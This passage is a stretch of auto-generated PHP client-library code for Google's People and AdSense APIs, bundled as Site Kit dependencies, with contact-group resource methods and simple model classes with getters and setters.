Values greater than 30 will be capped * to 30. * @opt_param string query Required. The plain-text query for the request. The * query is used to match prefix phrases of the fields on a person. For example, * a person with name "foo name" matches queries such as "f", "fo", "foo", "foo * n", "nam", etc., but not "oo n". * @opt_param string readMask Required. A field mask to restrict which fields on * each person are returned. Multiple fields can be specified by separating them * with commas. Valid values are: * emailAddresses * metadata * names * * phoneNumbers * @return SearchResponse * @throws \Google\Service\Exception */ public function search($optParams = []) { $params = []; $params = \array_merge($params, $optParams); return $this->call('search', [$params], \Google\Site_Kit_Dependencies\Google\Service\PeopleService\SearchResponse::class); } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\PeopleService\Resource\OtherContacts::class, 'Google\\Site_Kit_Dependencies\\Google_Service_PeopleService_Resource_OtherContacts'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\PeopleService\Resource; use Google\Site_Kit_Dependencies\Google\Service\PeopleService\BatchGetContactGroupsResponse; use Google\Site_Kit_Dependencies\Google\Service\PeopleService\ContactGroup; use Google\Site_Kit_Dependencies\Google\Service\PeopleService\CreateContactGroupRequest; use Google\Site_Kit_Dependencies\Google\Service\PeopleService\ListContactGroupsResponse; use Google\Site_Kit_Dependencies\Google\Service\PeopleService\PeopleEmpty; use Google\Site_Kit_Dependencies\Google\Service\PeopleService\UpdateContactGroupRequest; /** * The "contactGroups" collection of methods. * Typical usage is: * <code> * $peopleService = new Google\Service\PeopleService(...); * $contactGroups = $peopleService->contactGroups; * </code> */ class ContactGroups extends \Google\Site_Kit_Dependencies\Google\Service\Resource { /** * Get a list of contact groups owned by the authenticated user by specifying a * list of contact group resource names. (contactGroups.batchGet) * * @param array $optParams Optional parameters. * * @opt_param string groupFields Optional. A field mask to restrict which fields * on the group are returned. Defaults to `metadata`, `groupType`, * `memberCount`, and `name` if not set or set to empty. Valid fields are: * * clientData * groupType * memberCount * metadata * name * @opt_param int maxMembers Optional. Specifies the maximum number of members * to return for each group. Defaults to 0 if not set, which will return zero * members. * @opt_param string resourceNames Required. The resource names of the contact * groups to get. There is a maximum of 200 resource names. * @return BatchGetContactGroupsResponse * @throws \Google\Service\Exception */ public function batchGet($optParams = []) { $params = []; $params = \array_merge($params, $optParams); return $this->call('batchGet', [$params], \Google\Site_Kit_Dependencies\Google\Service\PeopleService\BatchGetContactGroupsResponse::class); } /** * Create a new contact group owned by the authenticated user. Created contact * group names must be unique to the users contact groups. Attempting to create * a group with a duplicate name will return a HTTP 409 error. Mutate requests * for the same user should be sent sequentially to avoid increased latency and * failures. (contactGroups.create) * * @param CreateContactGroupRequest $postBody * @param array $optParams Optional parameters. * @return ContactGroup * @throws \Google\Service\Exception */ public function create(\Google\Site_Kit_Dependencies\Google\Service\PeopleService\CreateContactGroupRequest $postBody, $optParams = []) { $params = ['postBody' => $postBody]; $params = \array_merge($params, $optParams); return $this->call('create', [$params], \Google\Site_Kit_Dependencies\Google\Service\PeopleService\ContactGroup::class); } /** * Delete an existing contact group owned by the authenticated user by * specifying a contact group resource name. Mutate requests for the same user * should be sent sequentially to avoid increased latency and failures. * (contactGroups.delete) * * @param string $resourceName Required. The resource name of the contact group * to delete. * @param array $optParams Optional parameters. * * @opt_param bool deleteContacts Optional. Set to true to also delete the * contacts in the specified group. * @return PeopleEmpty * @throws \Google\Service\Exception */ public function delete($resourceName, $optParams = []) { $params = ['resourceName' => $resourceName]; $params = \array_merge($params, $optParams); return $this->call('delete', [$params], \Google\Site_Kit_Dependencies\Google\Service\PeopleService\PeopleEmpty::class); } /** * Get a specific contact group owned by the authenticated user by specifying a * contact group resource name. (contactGroups.get) * * @param string $resourceName Required. The resource name of the contact group * to get. * @param array $optParams Optional parameters. * * @opt_param string groupFields Optional. A field mask to restrict which fields * on the group are returned. Defaults to `metadata`, `groupType`, * `memberCount`, and `name` if not set or set to empty. Valid fields are: * * clientData * groupType * memberCount * metadata * name * @opt_param int maxMembers Optional. Specifies the maximum number of members * to return. Defaults to 0 if not set, which will return zero members. * @return ContactGroup * @throws \Google\Service\Exception */ public function get($resourceName, $optParams = []) { $params = ['resourceName' => $resourceName]; $params = \array_merge($params, $optParams); return $this->call('get', [$params], \Google\Site_Kit_Dependencies\Google\Service\PeopleService\ContactGroup::class); } /** * List all contact groups owned by the authenticated user. Members of the * contact groups are not populated. (contactGroups.listContactGroups) * * @param array $optParams Optional parameters. * * @opt_param string groupFields Optional. A field mask to restrict which fields * on the group are returned. Defaults to `metadata`, `groupType`, * `memberCount`, and `name` if not set or set to empty. Valid fields are: * * clientData * groupType * memberCount * metadata * name * @opt_param int pageSize Optional. The maximum number of resources to return. * Valid values are between 1 and 1000, inclusive. Defaults to 30 if not set or * set to 0. * @opt_param string pageToken Optional. The next_page_token value returned from * a previous call to * [ListContactGroups](/people/api/rest/v1/contactgroups/list). Requests the * next page of resources. * @opt_param string syncToken Optional. A sync token, returned by a previous * call to `contactgroups.list`. Only resources changed since the sync token was * created will be returned. * @return ListContactGroupsResponse * @throws \Google\Service\Exception */ public function listContactGroups($optParams = []) { $params = []; $params = \array_merge($params, $optParams); return $this->call('list', [$params], \Google\Site_Kit_Dependencies\Google\Service\PeopleService\ListContactGroupsResponse::class); } /** * Update the name of an existing contact group owned by the authenticated user. * Updated contact group names must be unique to the users contact groups. * Attempting to create a group with a duplicate name will return a HTTP 409 * error. Mutate requests for the same user should be sent sequentially to avoid * increased latency and failures. (contactGroups.update) * * @param string $resourceName The resource name for the contact group, assigned * by the server. An ASCII string, in the form of * `contactGroups/{contact_group_id}`. * @param UpdateContactGroupRequest $postBody * @param array $optParams Optional parameters. * @return ContactGroup * @throws \Google\Service\Exception */ public function update($resourceName, \Google\Site_Kit_Dependencies\Google\Service\PeopleService\UpdateContactGroupRequest $postBody, $optParams = []) { $params = ['resourceName' => $resourceName, 'postBody' => $postBody]; $params = \array_merge($params, $optParams); return $this->call('update', [$params], \Google\Site_Kit_Dependencies\Google\Service\PeopleService\ContactGroup::class); } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\PeopleService\Resource\ContactGroups::class, 'Google\\Site_Kit_Dependencies\\Google_Service_PeopleService_Resource_ContactGroups'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\PeopleService; class SipAddress extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $formattedType; protected $metadataType = \Google\Site_Kit_Dependencies\Google\Service\PeopleService\FieldMetadata::class; protected $metadataDataType = ''; /** * @var string */ public $type; /** * @var string */ public $value; /** * @param string */ public function setFormattedType($formattedType) { $this->formattedType = $formattedType; } /** * @return string */ public function getFormattedType() { return $this->formattedType; } /** * @param FieldMetadata */ public function setMetadata(\Google\Site_Kit_Dependencies\Google\Service\PeopleService\FieldMetadata $metadata) { $this->metadata = $metadata; } /** * @return FieldMetadata */ public function getMetadata() { return $this->metadata; } /** * @param string */ public function setType($type) { $this->type = $type; } /** * @return string */ public function getType() { return $this->type; } /** * @param string */ public function setValue($value) { $this->value = $value; } /** * @return string */ public function getValue() { return $this->value; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\PeopleService\SipAddress::class, 'Google\\Site_Kit_Dependencies\\Google_Service_PeopleService_SipAddress'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\PeopleService; class Skill extends \Google\Site_Kit_Dependencies\Google\Model { protected $metadataType = \Google\Site_Kit_Dependencies\Google\Service\PeopleService\FieldMetadata::class; protected $metadataDataType = ''; /** * @var string */ public $value; /** * @param FieldMetadata */ public function setMetadata(\Google\Site_Kit_Dependencies\Google\Service\PeopleService\FieldMetadata $metadata) { $this->metadata = $metadata; } /** * @return FieldMetadata */ public function getMetadata() { return $this->metadata; } /** * @param string */ public function setValue($value) { $this->value = $value; } /** * @return string */ public function getValue() { return $this->value; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\PeopleService\Skill::class, 'Google\\Site_Kit_Dependencies\\Google_Service_PeopleService_Skill'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\PeopleService; class ModifyContactGroupMembersRequest extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'resourceNamesToRemove'; /** * @var string[] */ public $resourceNamesToAdd; /** * @var string[] */ public $resourceNamesToRemove; /** * @param string[] */ public function setResourceNamesToAdd($resourceNamesToAdd) { $this->resourceNamesToAdd = $resourceNamesToAdd; } /** * @return string[] */ public function getResourceNamesToAdd() { return $this->resourceNamesToAdd; } /** * @param string[] */ public function setResourceNamesToRemove($resourceNamesToRemove) { $this->resourceNamesToRemove = $resourceNamesToRemove; } /** * @return string[] */ public function getResourceNamesToRemove() { return $this->resourceNamesToRemove; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\PeopleService\ModifyContactGroupMembersRequest::class, 'Google\\Site_Kit_Dependencies\\Google_Service_PeopleService_ModifyContactGroupMembersRequest'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\PeopleService; class PersonMetadata extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'sources'; /** * @var bool */ public $deleted; /** * @var string[] */ public $linkedPeopleResourceNames; /** * @var string */ public $objectType; /** * @var string[] */ public $previousResourceNames; protected $sourcesType = \Google\Site_Kit_Dependencies\Google\Service\PeopleService\Source::class; protected $sourcesDataType = 'array'; /** * @param bool */ public function setDeleted($deleted) { $this->deleted = $deleted; } /** * @return bool */ public function getDeleted() { return $this->deleted; } /** * @param string[] */ public function setLinkedPeopleResourceNames($linkedPeopleResourceNames) { $this->linkedPeopleResourceNames = $linkedPeopleResourceNames; } /** * @return string[] */ public function getLinkedPeopleResourceNames() { return $this->linkedPeopleResourceNames; } /** * @param string */ public function setObjectType($objectType) { $this->objectType = $objectType; } /** * @return string */ public function getObjectType() { return $this->objectType; } /** * @param string[] */ public function setPreviousResourceNames($previousResourceNames) { $this->previousResourceNames = $previousResourceNames; } /** * @return string[] */ public function getPreviousResourceNames() { return $this->previousResourceNames; } /** * @param Source[] */ public function setSources($sources) { $this->sources = $sources; } /** * @return Source[] */ public function getSources() { return $this->sources; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\PeopleService\PersonMetadata::class, 'Google\\Site_Kit_Dependencies\\Google_Service_PeopleService_PersonMetadata'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\PeopleService; class ContactToCreate extends \Google\Site_Kit_Dependencies\Google\Model { protected $contactPersonType = \Google\Site_Kit_Dependencies\Google\Service\PeopleService\Person::class; protected $contactPersonDataType = ''; /** * @param Person */ public function setContactPerson(\Google\Site_Kit_Dependencies\Google\Service\PeopleService\Person $contactPerson) { $this->contactPerson = $contactPerson; } /** * @return Person */ public function getContactPerson() { return $this->contactPerson; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\PeopleService\ContactToCreate::class, 'Google\\Site_Kit_Dependencies\\Google_Service_PeopleService_ContactToCreate'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\PeopleService; class ListDirectoryPeopleResponse extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'people'; /** * @var string */ public $nextPageToken; /** * @var string */ public $nextSyncToken; protected $peopleType = \Google\Site_Kit_Dependencies\Google\Service\PeopleService\Person::class; protected $peopleDataType = 'array'; /** * @param string */ public function setNextPageToken($nextPageToken) { $this->nextPageToken = $nextPageToken; } /** * @return string */ public function getNextPageToken() { return $this->nextPageToken; } /** * @param string */ public function setNextSyncToken($nextSyncToken) { $this->nextSyncToken = $nextSyncToken; } /** * @return string */ public function getNextSyncToken() { return $this->nextSyncToken; } /** * @param Person[] */ public function setPeople($people) { $this->people = $people; } /** * @return Person[] */ public function getPeople() { return $this->people; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\PeopleService\ListDirectoryPeopleResponse::class, 'Google\\Site_Kit_Dependencies\\Google_Service_PeopleService_ListDirectoryPeopleResponse'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\PeopleService; class PersonResponse extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var int */ public $httpStatusCode; protected $personType = \Google\Site_Kit_Dependencies\Google\Service\PeopleService\Person::class; protected $personDataType = ''; /** * @var string */ public $requestedResourceName; protected $statusType = \Google\Site_Kit_Dependencies\Google\Service\PeopleService\Status::class; protected $statusDataType = ''; /** * @param int */ public function setHttpStatusCode($httpStatusCode) { $this->httpStatusCode = $httpStatusCode; } /** * @return int */ public function getHttpStatusCode() { return $this->httpStatusCode; } /** * @param Person */ public function setPerson(\Google\Site_Kit_Dependencies\Google\Service\PeopleService\Person $person) { $this->person = $person; } /** * @return Person */ public function getPerson() { return $this->person; } /** * @param string */ public function setRequestedResourceName($requestedResourceName) { $this->requestedResourceName = $requestedResourceName; } /** * @return string */ public function getRequestedResourceName() { return $this->requestedResourceName; } /** * @param Status */ public function setStatus(\Google\Site_Kit_Dependencies\Google\Service\PeopleService\Status $status) { $this->status = $status; } /** * @return Status */ public function getStatus() { return $this->status; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\PeopleService\PersonResponse::class, 'Google\\Site_Kit_Dependencies\\Google_Service_PeopleService_PersonResponse'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\PeopleService; class ClientData extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $key; protected $metadataType = \Google\Site_Kit_Dependencies\Google\Service\PeopleService\FieldMetadata::class; protected $metadataDataType = ''; /** * @var string */ public $value; /** * @param string */ public function setKey($key) { $this->key = $key; } /** * @return string */ public function getKey() { return $this->key; } /** * @param FieldMetadata */ public function setMetadata(\Google\Site_Kit_Dependencies\Google\Service\PeopleService\FieldMetadata $metadata) { $this->metadata = $metadata; } /** * @return FieldMetadata */ public function getMetadata() { return $this->metadata; } /** * @param string */ public function setValue($value) { $this->value = $value; } /** * @return string */ public function getValue() { return $this->value; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\PeopleService\ClientData::class, 'Google\\Site_Kit_Dependencies\\Google_Service_PeopleService_ClientData'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\PeopleService; class PeopleEmpty extends \Google\Site_Kit_Dependencies\Google\Model { } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\PeopleService\PeopleEmpty::class, 'Google\\Site_Kit_Dependencies\\Google_Service_PeopleService_PeopleEmpty'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\PeopleService; class ContactGroup extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'memberResourceNames'; protected $clientDataType = \Google\Site_Kit_Dependencies\Google\Service\PeopleService\GroupClientData::class; protected $clientDataDataType = 'array'; /** * @var string */ public $etag; /** * @var string */ public $formattedName; /** * @var string */ public $groupType; /** * @var int */ public $memberCount; /** * @var string[] */ public $memberResourceNames; protected $metadataType = \Google\Site_Kit_Dependencies\Google\Service\PeopleService\ContactGroupMetadata::class; protected $metadataDataType = ''; /** * @var string */ public $name; /** * @var string */ public $resourceName; /** * @param GroupClientData[] */ public function setClientData($clientData) { $this->clientData = $clientData; } /** * @return GroupClientData[] */ public function getClientData() { return $this->clientData; } /** * @param string */ public function setEtag($etag) { $this->etag = $etag; } /** * @return string */ public function getEtag() { return $this->etag; } /** * @param string */ public function setFormattedName($formattedName) { $this->formattedName = $formattedName; } /** * @return string */ public function getFormattedName() { return $this->formattedName; } /** * @param string */ public function setGroupType($groupType) { $this->groupType = $groupType; } /** * @return string */ public function getGroupType() { return $this->groupType; } /** * @param int */ public function setMemberCount($memberCount) { $this->memberCount = $memberCount; } /** * @return int */ public function getMemberCount() { return $this->memberCount; } /** * @param string[] */ public function setMemberResourceNames($memberResourceNames) { $this->memberResourceNames = $memberResourceNames; } /** * @return string[] */ public function getMemberResourceNames() { return $this->memberResourceNames; } /** * @param ContactGroupMetadata */ public function setMetadata(\Google\Site_Kit_Dependencies\Google\Service\PeopleService\ContactGroupMetadata $metadata) { $this->metadata = $metadata; } /** * @return ContactGroupMetadata */ public function getMetadata() { return $this->metadata; } /** * @param string */ public function setName($name) { $this->name = $name; } /** * @return string */ public function getName() { return $this->name; } /** * @param string */ public function setResourceName($resourceName) { $this->resourceName = $resourceName; } /** * @return string */ public function getResourceName() { return $this->resourceName; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\PeopleService\ContactGroup::class, 'Google\\Site_Kit_Dependencies\\Google_Service_PeopleService_ContactGroup'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\PeopleService; class UpdateContactPhotoRequest extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'sources'; /** * @var string */ public $personFields; /** * @var string */ public $photoBytes; /** * @var string[] */ public $sources; /** * @param string */ public function setPersonFields($personFields) { $this->personFields = $personFields; } /** * @return string */ public function getPersonFields() { return $this->personFields; } /** * @param string */ public function setPhotoBytes($photoBytes) { $this->photoBytes = $photoBytes; } /** * @return string */ public function getPhotoBytes() { return $this->photoBytes; } /** * @param string[] */ public function setSources($sources) { $this->sources = $sources; } /** * @return string[] */ public function getSources() { return $this->sources; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\PeopleService\UpdateContactPhotoRequest::class, 'Google\\Site_Kit_Dependencies\\Google_Service_PeopleService_UpdateContactPhotoRequest'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\PeopleService; class BatchCreateContactsResponse extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'createdPeople'; protected $createdPeopleType = \Google\Site_Kit_Dependencies\Google\Service\PeopleService\PersonResponse::class; protected $createdPeopleDataType = 'array'; /** * @param PersonResponse[] */ public function setCreatedPeople($createdPeople) { $this->createdPeople = $createdPeople; } /** * @return PersonResponse[] */ public function getCreatedPeople() { return $this->createdPeople; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\PeopleService\BatchCreateContactsResponse::class, 'Google\\Site_Kit_Dependencies\\Google_Service_PeopleService_BatchCreateContactsResponse'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\PeopleService; class Nickname extends \Google\Site_Kit_Dependencies\Google\Model { protected $metadataType = \Google\Site_Kit_Dependencies\Google\Service\PeopleService\FieldMetadata::class; protected $metadataDataType = ''; /** * @var string */ public $type; /** * @var string */ public $value; /** * @param FieldMetadata */ public function setMetadata(\Google\Site_Kit_Dependencies\Google\Service\PeopleService\FieldMetadata $metadata) { $this->metadata = $metadata; } /** * @return FieldMetadata */ public function getMetadata() { return $this->metadata; } /** * @param string */ public function setType($type) { $this->type = $type; } /** * @return string */ public function getType() { return $this->type; } /** * @param string */ public function setValue($value) { $this->value = $value; } /** * @return string */ public function getValue() { return $this->value; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\PeopleService\Nickname::class, 'Google\\Site_Kit_Dependencies\\Google_Service_PeopleService_Nickname'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\Adsense; class ListSavedReportsResponse extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'savedReports'; /** * @var string */ public $nextPageToken; protected $savedReportsType = \Google\Site_Kit_Dependencies\Google\Service\Adsense\SavedReport::class; protected $savedReportsDataType = 'array'; /** * @param string */ public function setNextPageToken($nextPageToken) { $this->nextPageToken = $nextPageToken; } /** * @return string */ public function getNextPageToken() { return $this->nextPageToken; } /** * @param SavedReport[] */ public function setSavedReports($savedReports) { $this->savedReports = $savedReports; } /** * @return SavedReport[] */ public function getSavedReports() { return $this->savedReports; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\Adsense\ListSavedReportsResponse::class, 'Google\\Site_Kit_Dependencies\\Google_Service_Adsense_ListSavedReportsResponse'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\Adsense; class Header extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $currencyCode; /** * @var string */ public $name; /** * @var string */ public $type; /** * @param string */ public function setCurrencyCode($currencyCode) { $this->currencyCode = $currencyCode; } /** * @return string */ public function getCurrencyCode() { return $this->currencyCode; } /** * @param string */ public function setName($name) { $this->name = $name; } /** * @return string */ public function getName() { return $this->name; } /** * @param string */ public function setType($type) { $this->type = $type; } /** * @return string */ public function getType() { return $this->type; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\Adsense\Header::class, 'Google\\Site_Kit_Dependencies\\Google_Service_Adsense_Header'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\Adsense; class Payment extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $amount; protected $dateType = \Google\Site_Kit_Dependencies\Google\Service\Adsense\Date::class; protected $dateDataType = ''; /** * @var string */ public $name; /** * @param string */ public function setAmount($amount) { $this->amount = $amount; } /** * @return string */ public function getAmount() { return $this->amount; } /** * @param Date */ public function setDate(\Google\Site_Kit_Dependencies\Google\Service\Adsense\Date $date) { $this->date = $date; } /** * @return Date */ public function getDate() { return $this->date; } /** * @param string */ public function setName($name) { $this->name = $name; } /** * @return string */ public function getName() { return $this->name; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\Adsense\Payment::class, 'Google\\Site_Kit_Dependencies\\Google_Service_Adsense_Payment'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\Adsense; class AdUnitAdCode extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $adCode; /** * @param string */ public function setAdCode($adCode) { $this->adCode = $adCode; } /** * @return string */ public function getAdCode() { return $this->adCode; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\Adsense\AdUnitAdCode::class, 'Google\\Site_Kit_Dependencies\\Google_Service_Adsense_AdUnitAdCode'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * 